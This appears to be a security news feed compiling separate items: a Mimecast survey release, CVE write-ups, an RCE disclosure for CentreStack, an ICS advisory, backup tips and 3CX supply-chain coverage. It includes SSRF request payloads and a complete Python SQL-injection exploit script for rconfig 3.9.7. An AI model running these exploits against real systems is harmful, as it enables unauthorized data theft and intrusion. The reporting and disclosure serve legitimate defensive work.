The State of Email Security Report reveals cyber risk commands the C-suite's focus.

**DUBAI****, UAE****,** **March 31, 2023** **/PRNewswire/ --** Mimecast, an advanced email and collaboration security company, today announced the publication of its annual "The State of Email Security 2023" (SOES) report. The global survey is based on responses from 1,700 IT and security decision-makers, providing readers with key takeaways on the current threat landscape and offering recommendations to help organizations improve their cybersecurity posture.

Download the full report – Mimecast's "The State of Email Security 2023"

The global report sheds light on the threats affecting companies across the globe, including the United Arab Emiratesand Saudi Arabia. Ninety four of respondents from the UAE and 100% from Saudi Arabia  reported to have been targeted by emailed-based phishing attacks in the last year, but they all said that they either have a system to monitor and protect against email-borne threats or are actively planning to roll one out.

**Highlights From This Year's Report** 

**Cyber awareness in the C-suite –** As cyberattacks continue to become more sophisticated, business leaders in the region have shown greater willingness to confront the risks involved and invest in proper measures to keep cyberattacks at bay. On average, 95% of companies in the UAE and Saudi Arabia reported needing stronger protection for their Microsoft 365 and Google Workspace applications, while 61% said their company needs to spend more on cybersecurity. However, all companies reported some form of cyber awareness training at their workplace, thus indicating a greater alertness to future attacks. With the increased focus on cyber preparedness by the C-suite, CISOs feel more empowered to articulate their requirements and implement strategies and tactics that will make their organization more secure.  

**Collaboration tools, essential but risky –** With workforces still divided between the office and remote locations, collaboration tools remain an essential yet risky part of communicating with team members. Eighty four percent of SOES participants in UAE and as many as 94% in Saudi Arabia agree that collaboration tools like Microsoft Teams or Slack are essential to their working function, but 82% from both countries expect to be harmed in 2023 by a collaboration-tool-based attack. The sharp increase in the use of these tools puts it directly in the minds of CISOs to ensure that adequate security measures are put in place for them to continue working protected while using them.

**Improved cyber preparedness –** There is a growing realization that cyber risk isn't just an IT problem — it's a critical vulnerability that directly equates to overall business risk. As such, organizations are taking the necessary measures to prepare for impending attacks.   Half are using artificial intelligence and machine learning to help under-resourced teams stay ahead of the curve, while the other half have plans to implement such measures. The use of AI tools will undoubtedly help under-resourced cybersecurity teams stay ahead of attacks and manage threats accordingly. Sixty four percent of Saudi Arabian respondents cited threat prevention as the top benefit of implementing AI, while 54% of organisations in UAE said reduced human error across the company was the biggest advantage. Overall, most companies believe that AI systems will help revolutionize the ways in which cybersecurity is practiced.

"Supply chain vulnerabilities, the rise of online collaboration and the growth of digital networking are among the chief reasons the cyber landscape is becoming more treacherous. The intersection of communications, people, and data carries a tremendous amount of risk, as malicious actors exploit the interconnectedness of the modern work surface," says Werno Gevers, regional leader of Mimecast Middle East. "Our research shows that corporate boards have finally woken up to the realisation that cyber risk is business risk, so it's time for CISOs to make the case for increased budgets and greater cyber resiliency."

Download the full report and view the UAE and Saudi Arabia infographics to learn more, and stay tuned to the Mimecast blog Cyber Resilience Insights_._

**Mimecast: Work Protected™**  

Since 2003, Mimecast has stopped bad things from happening to good organizations by enabling them to work protected. We empower more than 40,000 customers to help mitigate risk and manage complexities across a threat landscape driven by malicious cyberattacks, human error, and technology fallibility. Our advanced solutions provide the proactive threat detection, brand protection, awareness training, and data retention capabilities that evolving workplaces need today. Mimecast solutions are designed to transform email and collaboration security into the eyes and ears of organizations worldwide.  

_Mimecast, the Mimecast logo, and Work Protected are either registered trademarks or trademarks of Mimecast Services Limited in_ the United States _and/or other countries.  All rights reserved.  All other third-party trademarks and logos contained in this press release are the property of their respective owners._

SOURCE Mimecast

Mimecast Report Reveals Nearly 60% of Companies in UAE and Saudi Arabia Need to Increase Cybersecurity Spending

request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.

\# request-baskets SSRF details Follow the official documentation to start forem with docker installation. !\[\](https://notes.sjtu.edu.cn/uploads/upload\_f37294d56f74b588fac26542b22f7624.png) Then, we log in to the administrator background: !\[\](https://notes.sjtu.edu.cn/uploads/upload\_5fa5fdd0cd07c6d78a8e34f54c839f3d.png) The following API's forward\_url parameter is vulnerable to SSRF： 1. /api/baskets/{name} 2. /baskets/{name} Let's take /api/baskets/{name} API as an example, another API is the same vulnerability. We use the following payload to post /api/baskets/{name} API： \`\`\` { "forward\_url": "http://127.0.0.1:80/test", "proxy\_response": false, "insecure\_tls": false, "expand\_path": true, "capacity": 250 } \`\`\` !\[\](https://notes.sjtu.edu.cn/uploads/upload\_2f8962255d21885cb2c34b95a1baa801.png) Direct post can only set the url, you need to visit the url - http://192.168.175.213:55555/test to trigger the SSRF vulnerability. !\[\](https://notes.sjtu.edu.cn/uploads/upload\_8371c9701d7823878b9cc0cb4a6d44b4.png) # Influence： \*\*Information Disclosure and Exfiltration\*\* This was previously identified as an issue. Requests for images that are unauthenticated can lead to the leak of all existing images in the server. However, this isn't limited to just images. Any resource that can be obtained via an HTTP request on the local network of the webserver can be obtained remotely via this request. \*\*Unauthenticated Access to Internal Network HTTP Servers\*\* The SSRF attack can be leveraged to connect to any HTTP Server connected to the same network as the request-baskets server, for instance an Nginx server exposed only internally, an internal RESTful API, such as a NoSQL database, or a GraphQL database. This is not limited just to services hosted on the local machine, but all the machines connected on the local network. \*\*Port and IP Scanning and Enumeration\*\* This vulnerability can be leveraged to port scan for HTTP servers both internal and external services on demand, as well as enumerating all the machines in the local network that have open HTTP ports.

CVE-2023-27163: request-baskets SSRF details - CodiMD

openapi-generator up to v6.4.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/gen/clients/{language}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.

\# openapi-generator API SSRF details When we tested the official demo website of openapi-generator, we found SSRF vulnerabilities in the following APIs, which proves that openapi-generator also has this SSRF vulnerability. The following API's openAPIUrl parameter is vulnerable to SSRF: 1. /api/gen/clients/{language} 2. /api/gen/servers/{framework} Let’s take /api/gen/clients/{language} API as an example, another API is the same vulnerability. We modify the original API request parameters, here we use dnsLog to verify the existence of SSRF vulnerabilities. !\[\](https://notes.sjtu.edu.cn/uploads/upload\_27041c70c32fc6630d4507d38436e91b.png) The dnslog records are as follows： !\[\](https://notes.sjtu.edu.cn/uploads/upload\_6593542e6d7d269dbbd1e48c39e785ec.png) This confirms the existence of the SSRF vulnerability. # Influence： \*\*Information Disclosure and Exfiltration\*\* This was previously identified as an issue. Requests for images that are unauthenticated can lead to the leak of all existing images in the server. However, this isn't limited to just images. Any resource that can be obtained via an HTTP request on the local network of the webserver can be obtained remotely via this request. \*\*Unauthenticated Access to Internal Network HTTP Servers\*\* The SSRF attack can be leveraged to connect to any HTTP Server connected to the same network as the openapi-generator server, for instance an Nginx server exposed only internally, an internal RESTful API, such as a NoSQL database, or a GraphQL database. This is not limited just to services hosted on the local machine, but all the machines connected on the local network. \*\*Port and IP Scanning and Enumeration\*\* This vulnerability can be leveraged to port scan for HTTP servers both internal and external services on demand, as well as enumerating all the machines in the local network that have open HTTP ports.

CVE-2023-27162: openapi-generator API SSRF details - CodiMD

forem up to v2022.11.11 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /articles/{id}. This vulnerability allows attackers to access network resources and sensitive information via a crafted POST request.

  
**Forem 🌱**

**For Empowering Community**

   

Welcome to the Forem codebase, the platform that powers dev.to. We are so excited to have you. With your help, we can build out Forem’s usability, scalability, and stability to better serve our communities.

**What is Forem?**

Forem is open source software for building communities. Communities for your peers, customers, fanbases, families, friends, and any other time and space where people need to come together to be part of a collective. See our announcement post for a high-level overview of what Forem is.

dev.to (or just DEV) is hosted by Forem. It is a community of software developers who write articles, take part in discussions, and build their professional profiles. We value supportive and constructive dialogue in the pursuit of great code and career growth for all members. The ecosystem spans from beginner to advanced developers, and all are welcome to find their place within our community. ❤️

**Table of Contents**

*   What is Forem?
*   Table of Contents
*   Community
*   Contributing
*   Getting Started
    *   Prerequisites
        *   Local
        *   Containers
    *   Installation Documentation
*   Developer Documentation
*   Core team
*   Vulnerability disclosure
*   Acknowledgements
*   License

**Community**

For a place to have open discussions on features, voice your ideas, or get help with general questions please visit our community at forem.dev.

**Contributing**

We encourage you to contribute to Forem! Please check out the Contributing to Forem guide for guidelines about how to proceed.

**Getting Started**

This section provides a high-level quick start guide. If you're looking for a more thorough installation guide (for example with macOS, you'll want to refer to our complete Developer Documentation.

We run on a Rails backend, and we are currently transitioning to a Preact\-first frontend.

A more complete overview of our stack is available in our docs.

To **launch Forem in Gitpod**, navigate to https://gitpod.io/#https://github.com/{your\_github\_username}/forem.

**Prerequisites****Local**

*   Ruby: we recommend using rbenv to install the Ruby version listed on the badge.
*   Yarn 1.x: please refer to their installation guide.
*   PostgreSQL 11 or higher.
*   ImageMagick: please refer to ImageMagick's installation instructions.
*   Redis 4 or higher.

**Containers**

**Linux**

*   Podman 1.9.2 or higher
*   Podman Compose 0.1.5 or higher

**OS X**

*   Docker Desktop for Mac

**Installation Documentation**

Please see our installation guides, such as the one for macOS.

**Developer Documentation**

Check out our dedicated docs page for more technical documentation.

**Core team**

*   @benhalpern
*   @jessleenyc
*   @peterkimfrank
*   @maestromac
*   @lightalloy
*   @ridhwana
*   @rt4914
*   @jaw6
*   @lboogie2004
*   @klardotsh

**Vulnerability disclosure**

Forem is the open source software which powers DEV.

We welcome security research on DEV under the terms of our vulnerability disclosure policy.

**Acknowledgements**

Thank you to the Twemoji project for the usage of their emojis.

**License**

This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. Please see the LICENSE file in our repository for the full text.

Like many open source projects, we require that contributors provide us with a Contributor License Agreement (CLA). By submitting code to the Forem project, you are granting us a right to use that code under the terms of the CLA.

Our version of the CLA was adapted from the Microsoft Contributor License Agreement, which they generously made available to the public domain under Creative Commons CC0 1.0 Universal.

Any questions, please refer to our license FAQ doc or email yo@dev.to.

  
**Happy Coding** ❤️

⬆ Back to Top

CVE-2023-27160: GitHub - forem/forem: For empowering community 🌱

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between March 24 and March 31. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for March 24 to March 31

An authentication bypass vulnerability in the Password Reset component of Gladinet CentreStack before 13.5.9808 allows remote attackers to set a new password for any valid user account, without needing the previous known password, resulting in a full authentication bypass.

White Oak Security discovered an instance of Gladinet’s CentreStack server which was vulnerable to an authentication bypass and an arbitrary file upload resulting in remote code execution.

This issue has been remediated as of release 13.5.9808 – June 13, 2022 (1). These issues were tracked as S-8238.

**CentreStack Vulnerability Disclosure Timeline**

White Oak Security (WOS) followed responsible disclosure guidelines by giving Gladinet time to remediate this vulnerability and allow customers ample time to patch their instances. Once we were able to establish contact with Gladinet, we appreciated their quick response to remediating the reported issues.

**4/16/22**: Attempted to contact Gladinet via online support ticket.

**4/22/22**: Second attempt to contact Gladinet via online support ticket.

**5/10/22**: Attempted to contact Gladinet via generic cold email methods.

**5/12/22**: Successfully contacted Gladinet via customer support phone number and follow-up emails.

**5/16/22**: Vulnerabilities disclosed to Gladinet via online support ticket.

**6/13/22**: Patch made available by Gladinet, identified by ID S-8238.

**2/2/23:** White Oak Security publicly discloses the finding according to our vulnerability disclosure policy.

**CentreStack**

CentreStack is an on-premise solution that provides file share, backup services, and remote file access which can be managed by a web application.

**CentreStack Exposure**

Using Shodan, the CentreStack web server can be found exposed on the internet on a handful of servers. 

**Analysis: Unauthenticated Password Reset**

White Oak Security identified an access control violation where unauthenticated attackers can access the change password controller and, without providing the original user account password, force an update for an existing user account. The result is a full authentication bypass which allows a malicious user to gain access to an administrator account.

As a demonstration, an invalid login attempt for the account admin@test.com was performed using the password: “fakepassword!.

The application denies the login request as expected due to an invalid password:

Next, the unauthenticated malicious actor forcefully navigates to the password reset application page. A form is created which prompts the user to attempt a password reset.

The malicious actor intercepts this request, modifies the hfTicket value to contain a username, in this case, the victim user admin@test.com, and sets a new password for the account “fakepassword!”.

The application successfully processes this request:

Lastly, the malicious actor once again navigates to the main login page and attempts to login as the admin@test.com user with the newly forced password.

The application successfully authenticates the user since the account password had been changed, and the malicious actor gains the permissions of any account that had been reset, in this case, full administrative privileges.

**Analysis: Unrestricted File Upload**

Now that White Oak Security established a valid authentication bypass, WOS focused its efforts on obtaining code execution. An unrestricted file upload vulnerability was discovered within the Cluster and Tenant branding functionality, accessible by an administrator of the application. When chained together with an abuse of the Anti-Virus engine, the result is code execution. 

The branding image upload functionality does not limit what file types that can be uploaded to the server, which allows a malicious actor to upload a custom executable file. In this example, a reverse shell binary is uploaded in the Logo handler:

Once the binary has been uploaded, the application reveals a broken image as expected since the content is not actually an image indicating that our upload has been successful:

Upon inspecting the network traffic, we can see that the download for the logo image does return the binary program:

In order to achieve command execution, the full path of the uploaded image is required in order to be exploited with the Anti-Virus engine. On the filesystem, we can observe that a random GUID has been created within the **C:/CentreStack** directory.

While this GUID is random, the GUID can be leaked by interacting with the local file image editor or local application editor with any uploaded file:

The network traffic for this request leaks the full GUID in the LocalEditPage.aspx application response:

Next, the filename of the raw binary also contains a GUID with a fixed name “Brand\_LogoImg” appended to the GUID that is generated.

However, this value is simply the **_y-glad-brid_** session value which can easily be found throughout any authenticated request:

Now that the full path of the uploaded binary has been discovered through the application’s own components, the Anti-Virus engine scanner location can be modified to the full path of the binary:

Since the Anti-Virus engine does not limit the path of the potential programs that can be executed, any arbitrary binary on the system can be executed as the Anti-Virus engine.

Lastly, a malicious actor simply has to upload any file to the CentreStack server which will trigger the Anti-Virus scan to execute and run the custom binary:

On the attacker-controlled machine, the reverse shell is executed and a successful connection is observed. The process is additionally being executed with the highest permissions of **NT AUTHORITY\\SYSTEM**.

Upon inspecting the executing processes on the server with ProcessExplorer (2), the execution path is observed as the **GladinetCloudMonitor.exe** service executing the binary as NT AUTHORITY\\SYSTEM compared to the web server permissions of IIS APPPOOL. This is due to the Anti-Virus programs requiring a higher permission to scan local files, however, this gains an attacker full administrative privileges over the underlying server.

While the unrestricted file upload vulnerability was used to upload arbitrary files to the server, White Oak Security could have alternatively uploaded a malicious file to the server using the built-in file storage mechanism, and simply pointed the Anti-Virus engine to execute that program and obtain a shell in that fashion. 

However, it was more interesting to identify a vulnerability rather than built-in functionality to chain together this attack path.

****More From White Oak Security****

White Oak Security is a highly skilled and knowledgeable cyber security and penetration testing company that works hard to get into the minds of opponents to help protect those we serve from malicious threats through expertise, integrity, and passion.

Read more from White Oak Security’s pentesting team.

****Sources****

1\. https://www.centrestack.com/p/gce\_latest\_release.html – CentreStack Release History

2\. https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer – ProcessExplorer

CVE-2023-26829: CentreStack Vulnerability Disclosure | White Oak Security

rconfig version 3.9.7 suffers from a remote SQL injection vulnerability.

    # Exploit Title: rconfig 3.9.7 - Sql Injection (Authenticated)# Exploit Author: azhen# Date: 10/12/2022# Vendor Homepage: https://www.rconfig.com/# Software Link: https://www.rconfig.com/# Vendor: rConfig# Version: <= v3.9.7# Tested against Server Host: Linux# CVE: CVE-2022-45030import requestsimport sysimport urllib3urllib3.disable_warnings()s = requests.Session()# sys.argv.append("192.168.10.150") #Enter the hostnameif len(sys.argv) != 2:    print("Usage: python3 rconfig_sqli_3.9.7.py <host>")    sys.exit(1)host=sys.argv[1] #Enter the hostnamedef get_data(host):    print("[+] Get db data...")    vul_url = "https://"+host+":443/lib/ajaxHandlers/ajaxCompareGetCmdDates.php?deviceId=-1&command='+union+select+concat(1000%2bord(substr({},{},1)),'-1-1')%20--%20"    query_exp = "database()"    result_data = ""    for i in range(1, 100):        burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate"}        res = requests.get(vul_url.format(query_exp, i), cookies=s.cookies,verify=False)        # print(res.text)        a = chr(int(res.text[6:10]) - 1000)        if a == '\x00':            break        result_data += a                print(result_data)        print("[+] Database name: {}".format(result_data))    '''    output:    [+] Logging in...    [+] Get db data...    r    rc    rco    rcon    rconf    rconfi    rconfig    rconfigd    rconfigdb    [+] Database name: rconfigdb            '''def login(host):    print("[+] Logging in...")    url = "https://"+host+":443/lib/crud/userprocess.php"    headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"}        data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin    response=s.post(url, headers=headers, cookies=s.cookies, data=data, verify=False)    get_data(host)login(host)

rconfig 3.9.7 SQL Injection

By Habiba Rashid
CISA's advisory came after the Macedonian cybersecurity firm Zero Science Lab discovered and reported the vulnerabilities to authorities.
This is a post from HackRead.com Read the original post: CISA Warns of Vulnerabilities in Propump and Controls’ Osprey Pump Controller

The critical set of vulnerabilities allowed attackers to cause significant problems, such as taking control of the device and disrupting the water supply, among other nefarious activities.

Propump and Controls, a US-based company specializing in pumping systems and automated controls, has been found to have vulnerabilities in its Osprey Pump Controller, according to a report by Cybersecurity research firm Zero Science Lab.

The report stated that the vulnerabilities could allow hackers to cause significant problems, such as remotely taking control of the device and disrupting the water supply, among other nefarious activities.

CISA has published an advisory describing the vulnerabilities found by Krstic in the Osprey Pump Controller, and ten individual advisories describing each flaw were also published by Zero Science Lab’s website. The affected product is the Osprey Pump Controller version 1.01, which is used in pumping systems and automated controls. The following vulnerabilities have been discovered:

*   Insufficient entropy CWE-331: A predictable weak session token generation algorithm could aid in authentication and authorization bypass, allowing a threat actor to hijack a session by predicting the session id and gain unauthorized access to the product. CVE-2023-28395 has been assigned to this vulnerability. 

*   Use of GET request method with sensitive query strings CWE-598: An unauthenticated file disclosure could allow cybercriminals to force the affected device to disclose arbitrary files and sensitive system information. CVE-2023-28375 has been assigned to this vulnerability. 

*   Use of hard-coded password CWE-259: The web management interface configuration can be fully accessed through a hidden administrative account that has a hardcoded password. However, this account cannot be seen in the Usernames and Passwords menu of the application, and its password cannot be changed through any regular operation of the device. CVE-2023-28654 has been assigned to this vulnerability. 

*   Improper neutralization of special elements used in an OS command (‘OS command injection’) CWE-78: Vulnerability could allow unauthenticated OS command injection that may lead to an attacker injecting and executing arbitrary shell commands through HTTP POST or GET parameters. CVE-2023-27886 and CVE-2023-27394 have been assigned to these vulnerabilities.

*   Improper neutralization of input during web page generation (‘Cross-site scripting’) CWE-79: Inputs passed to a GET parameter are not properly sanitized before being returned to the user, which could enable attackers to execute arbitrary HTML/JS code in a user’s browser session in context of an affected site. CVE-2023-28648 has been assigned to this vulnerability.

*   Authentication bypass using an alternate path or channel CWE-288: This could enable an unauthorized user to bypass authentication and gain access to the system by creating an account through an alternate path or channel. CVE-2023-28398 has been assigned to this vulnerability.

*   Cross-site request forgery (CSRF) CWE-352: HTTP requests can be used by users to carry out actions without undergoing any verification checks. This may lead to a scenario where an individual without authorization may be able to carry out actions with administrative privileges in the event a logged-in user visits a harmful website. CVE-2023-28718 has been assigned to this vulnerability.

According to Security Week, the founder and chief information security engineer of Zero Science Lab, Gjoko Krstic, attempted to report his findings to the vendor, as well as the US Cybersecurity and Infrastructure Security Agency (CISA) and Carnegie Mellon University’s Vulnerability Information and Coordination Environment (VINCE), but the vendor has not responded, and the vulnerabilities likely remain unpatched.

According to Krstic, dozens of controllers are exposed on the internet, including in the case of the client whose network was assessed by Zero Science Lab. This means that attackers can access the controller and manipulate VFDs, change pressure, or cut down the water supply, depending on where the controller is applied.

In conclusion, the discovery of vulnerabilities in ProPump and Controls’ Osprey Pump Controller raises concerns about the security of industrial control systems. Companies need to ensure that their products are secure and that vulnerabilities are addressed in a timely and effective manner to prevent potential attacks that can lead to significant disruptions and damages.

However, as the vendor, in this case, has not responded, users of the Osprey Pump Controller need to take necessary precautions as instructed in the CISA advisory to protect their systems from possible attacks.

1.  Vulnerability that physically damage moving bridges
2.  Russian Building Controllers Can be Remotely Hacked
3.  Industrial Control Systems flaws let hackers unlock doors
4.  Using programmable logic controllers in industrial settings
5.  IoT Devices Hacked to Install Ransomware on OT Networks

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

CISA Warns of Vulnerabilities in Propump and Controls’ Osprey Pump Controller

Categories: Personal
Because backups are the dental floss of cybersecurity—the thing that everyone knows they should do, that everyone intends to do, that nobody actually does.



(Read more...)




The post 3 tips to raise your backup game appeared first on Malwarebytes Labs.

Happy World Backup Day everyone!

What, you didn't know it was World Backup Day? Hmmm, perhaps that's not a surprise. If there was an award for "most overlooked really important thing in computing", backups would win. Every year.

So let's put that right this year and spend a minute or two of World Backup Day thinking about backups. Backups are great! Having backups is like having a do-over for your mistakes, and who hasn't wished for that? And they can keep you safe too. Good computer security means creating layers of protection that overlap and cover each others' backs. The final layer is your backups. They're a "get out of jail free" card you can play if any of your files are destroyed, deleted, or corrupted by malware.

To get you off on the right foot we've got three tips: A beginner tip, an intermediate tip, and an advanced tip.

**1\. Make backups**

Yes, our first tip really is "make backups". Why? Because backups are the dental floss of cybersecurity—the thing that everyone knows they should do, that everyone _intends_ to do, that nobody actually does.

You need to floss your computer, every day. We don't care how you do it: You can use the cloud, put your files on a USB stick, plug in an external hard drive, burn your data to a disk (ask your parents), copy them to an FTP site (ask your grandparents), or print them out and bind them in a book for all we care. All we ask is that you make a copy of your data, and then make making copies of your data a habit.

The only backup you'll ever regret is the one you didn't make.

**2\. Make them automatic**

Once you decide that you're going to make regular copies of your data you are, in all likelihood, going to get bored of doing it and slip up on your rigorous, well-intentioned schedule. Humans just aren't good at doing the same thing, the same way, every day. But you know what is? A computer.

So, our intermediate tip is to let the computer take the strain of remembering what you want to backup and when. They love that stuff.

Windows and macOS both come with backup software included, each of which is perfectly on-brand for your platform of choice. The Windows backup solution has a boring and sensible name. It's called Backup and Restore. On Mac you'll be using a Time Machine, because Apple lets its marketing department in the room when things are being named. As you'd expect, if you're a Linux user there are a bewildering number of options to choose from. If you're blinded by overchoice, check out Amanda.

**3\. Make sure they work**

If you've followed tip two and automated your backups then you can sit back and relax right? Sure, you can. But if you want to know _for sure_ that your backup solution will be there for when you need it most, you need to test it. After all, a backup is only as useful as the data you can actually restore from it.

Anyone who works with computers knows that assumption is the mother of all f\*\*\* ups, so don't assume your backups work, prove they do. Pick a file you really care about and go get a copy of it from your backups. Better yet, if you have a directory where you keep lots of important files, restore that. Not only will that prove to you that your backups can dig you out of trouble if they ever need to, you'll get a feel for how slow that process can be if you're backing up over Wi-Fi. Understanding that restoring a lot of files from a backup can be a lengthy process will help you set your expectations and manage your stress levels if you ever need to.

**Pat yourself on the back**

Whether you made it all the way to rolling out tip three, or you stopped at one, we applaud you. Your digital life is now more resilient than it was, which means you'll be better able to weather hardware failures, accidental deletions, and malware outbreaks. 

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

3 tips to raise your backup game

Enterprise communications software maker 3CX on Thursday confirmed that multiple versions of its desktop app for Windows and macOS are affected by a supply chain attack.
The version numbers include 18.12.407 and 18.12.416 for Windows and 18.11.1213, 18.12.402, 18.12.407, and 18.12.416 for macOS.
The company said it's engaging the services of Google-owned Mandiant to review the incident. In the

Cyber Threat / Supply Chain Attack

Enterprise communications software maker 3CX on Thursday confirmed that multiple versions of its desktop app for Windows and macOS are affected by a supply chain attack.

The version numbers include **18.12.407 and 18.12.416** for Windows and **18.11.1213, 18.12.402, 18.12.407, and 18.12.416** for macOS.

The company said it's engaging the services of Google-owned Mandiant to review the incident. In the interim, it's urging its customers of self-hosted and on-premise versions of the software to update to version 18.12.422.

"3CX Hosted and StartUP users do not need to update their servers as we will be updating them over the night automatically," 3CX CEO Nick Galea said in a post on Thursday. "Servers will be restarted and the new Electron App MSI/DMG will be installed on the server."

Evidence available so far points to either a compromise of 3CX's software build pipeline to distribute Windows and macOS versions of the app package, or alternatively, the poisoning of an upstream dependency. The scale of the attack is currently unknown.

The earliest period of potentially malicious activity is said to have been detected on or around March 22, 2023, according to a post on the 3CX forum, although preparations for the campaign are said to have commenced no later than February 2022.

3CX said the initial alert flagging a potential security problem in its app last week was treated as a "false positive" owing to the fact that none of the antivirus engines on VirusTotal labeled it as suspicious or malware.

The Windows version of the attack leveraged a technique called DLL side-loading to load a rogue library referred to as "ffmpeg.dll" that's designed to read encrypted shellcode from another DLL called "d3dcompiler\_47.dll."

This involved accessing a GitHub repository to retrieve an ICO file containing URLs hosting the final-stage payload, an information stealer (dubbed ICONIC Stealer or SUDDENICON) capable of harvesting system information and sensitive data stored in web browsers.

"The choice of these two DLLs – ffmpeg and d3dcompiler\_47 – by the threat actors behind this attack was no accident," ReversingLabs security researcher Karlo Zanki said.

"The target in question, 3CXDesktopApp, is built on the Electron open source framework. Both of the libraries in question usually ship with the Electron runtime and, therefore, are unlikely to raise suspicion within customer environments."

SUDDENICON downloading a new executable

The macOS attack chain, in the same vein, bypassed Apple's notarization checks to download an unknown payload from a command-and-control (C2) server that's currently unresponsive.

"The macOS version does not use GitHub to retrieve its C2 server," Volexity said, which is tracking the activity under the cluster UTA0040. "Instead, a list of C2 servers is stored in the file encoded with a single byte XOR key, 0x7A."

THN WEBINAR

Become an Incident Response Pro!

Unlock the secrets to bulletproof incident response – Master the 6-Phase process with Asaf Perlman, Cynet's IR Leader!

Don't Miss Out – Save Your Seat!

Cybersecurity firm CrowdStrike, in an advisory of its own, has attributed the attack with high confidence to Labyrinth Chollima (aka Nickel Academy), a North Korea-aligned state-sponsored actor.

"The activity, which targets many organizations across a broad range of verticals without any obvious patterns, has been attributed to Labyrinth Chollima based on observed network infrastructure uniquely associated with that adversary, similar installation techniques, and a reused RC4 key," Adam Meyers, senior vice president of intelligence at CrowdStrike, told The Hacker News.

"The trojanized 3CX applications invoke a variant of ArcfeedLoader, malware uniquely attributed to Labyrinth Chollima."

Labyrinth Chollima, per the Texas-based company, is a subset of the Lazarus Group, which also constitutes Silent Chollima (aka Andariel or Nickel Hyatt) and Stardust Chollima (aka BlueNoroff or Nickel Gladstone).

The group "has been active at least since 2009 and typically tries to generate revenue by targeting crypto and financial organizations," Meyers said, adding it's "likely affiliated with Bureau 121 of the DPRK's Reconnaissance General Bureau (RGB) and primarily conducts espionage operations and revenue generation schemes."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#mac